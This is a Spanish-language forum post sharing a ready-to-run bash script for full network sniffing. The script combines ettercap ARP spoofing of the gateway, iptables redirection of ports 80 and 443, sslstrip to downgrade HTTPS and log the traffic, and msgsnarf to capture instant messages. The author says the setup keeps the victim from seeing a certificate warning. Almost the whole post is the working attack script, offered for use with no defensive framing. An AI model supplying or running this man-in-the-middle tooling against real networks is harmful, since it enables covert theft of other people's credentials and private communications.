Autor
Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.
Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh
y por ultimo #./snifeototal.sh, espero que te sirva.
texto a copiar:
echo
echo "Full Sniffing-----------------"
echo "-------------by Usuario Equis"
echo
echo -n "Adaptador de RED: "
read -e ADAPT
echo -n "Puerta de Enlace o Gateway: "
read -e GATEW
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log
sleep 1
iptables -t nat -L -n
sleep 1
iptables -t nat -D PREROUTING 1
iptables -t nat -D PREROUTING 1
iptables -t nat -L -n
sleep 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 10000
xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log
sleep 1
xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log
xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log
xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT
|
 |
Bienvenido(a), Visitante. Por favor Ingresar o Registrarse ¿Perdiste tu email de activación?. |
En línea
